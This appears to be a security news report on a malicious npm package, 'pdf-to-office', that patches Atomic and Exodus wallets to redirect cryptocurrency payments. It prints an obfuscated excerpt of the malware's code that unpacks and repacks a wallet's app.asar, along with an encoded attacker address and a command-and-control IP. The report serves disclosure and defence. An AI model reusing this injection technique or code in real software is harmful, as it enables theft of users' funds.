Cybersecurity researchers have uncovered a sophisticated malware campaign targeting cryptocurrency users through compromised npm packages.
The attack specifically targets users of Atomic and Exodus wallets, hijacking transactions by injecting malicious code that redirects funds to attacker-controlled addresses.
This latest campaign represents an escalation in the ongoing targeting of cryptocurrency users through software supply chain attacks.
The attack begins when a developer installs a compromised npm package into a project.
One such package identified in this campaign is “pdf-to-office”, whose name suggests a document-conversion utility but which carries hidden malicious functionality.
Once installed, the package checks the system for Atomic and Exodus wallet installations and patches the wallet’s own application files so that transactions can be intercepted and redirected without the user’s knowledge.
The impact of this attack is potentially devastating for victims, as it can silently redirect cryptocurrency transactions to attacker-controlled wallets across multiple cryptocurrencies including Ethereum, Tron-based USDT, XRP, and Solana.
The malware effectively hijacks transactions by replacing legitimate wallet addresses with encoded attacker addresses at the moment users attempt to send funds.
ReversingLabs researchers identified the campaign while analysing suspicious npm packages, noting several telltale signs of malicious behaviour, including connections to suspicious URLs and code patterns matching previously identified malicious packages.
Their analysis showed that the attackers rely on techniques that keep the compromise in place and hard to spot: the modification is written into the wallet’s own application files rather than remaining in the npm package, which is how it persists after the package itself is gone.
Technical examination reveals a multi-stage attack that begins with package installation and proceeds through wallet identification, file extraction, code injection, and ultimately transaction hijacking.
The attackers use obfuscation techniques to hide their true intentions, making detection challenging for traditional security tools.
The infection proceeds as follows once the malicious package runs its payload against installed wallet software.
The code first locates the wallet’s application files on the system and targets the ASAR archive format that Electron-based applications use to bundle their JavaScript.
It specifically searches for paths such as “AppData/Local/Programs/atomic/resources/app.asar”.
Once the archive is found, the malware extracts it to a temporary directory, overwrites selected files with its own copies, repacks the archive over the original, and deletes the working directory.
The following code snippet from the package illustrates this process:
// Obfuscated excerpt as recovered from the package; the _0x… identifiers are bound earlier in the payload.
// Assumed bindings (not shown on the page): path = require('path'), asar = the asar npm package,
// fs = a promise-returning fs wrapper (fs-extra or similar) that also exposes existsSync.
const _0x3b6acf = path.join(_0x3pbact, 'dist', 'electron'); // temporary extraction directory
if (fs.existsSync(_0x59578f)) {                               // _0x59578f: path to the wallet's app.asar
  await fs.mkdir(_0x3b6acf, {
    'recursive': true
  });
  await asar.extractAll(_0x59578f, _0x3b6acf);                // unpack the wallet bundle
  await fs.copyFile(_0x190a5b, _0x2e871a);                    // overwrite extracted files with attacker-supplied replacements
  await fs.copyFile(_0x1a4254, _0xf71fca);
  await asar.createPackage(_0x3b6acf, _0x59578f);             // repack over the original app.asar
  await fs.rm(_0x3b6acf, {                                    // remove the working directory
    'recursive': true,
    'force': true
  });
}
The injection targets specific JavaScript files inside the wallet bundle, in particular vendor bundles such as “vendors.64b69c3b00e2a7914733.js”.
The malware modifies the transaction-handling code so that the recipient address is swapped for an attacker-controlled one; the substitute addresses are stored base64-encoded in the patched file and decoded at the moment a transaction is built, which keeps a plain-text address out of casual inspection.
For example, when a user attempts to send ETH, the code replaces the recipient address with the decoded value of “MHg0N2V1MEU4MUY10URiMjdGMDM0ZjRlYjEwRjk5MTIzMGY2NmY1M2ZB”[1].
After completing the infection, the malware reports to a command-and-control server at 178.156.149.109, sending installation status information that includes the user’s home directory path.
This lets the attackers track successful infections and potentially gather additional information about compromised systems; the address is also a usable network indicator for blocking and hunting.
Because the modification lives in the wallet’s own app.asar, removing the npm package does not restore the wallet; an affected installation should be reinstalled from the vendor’s official distribution.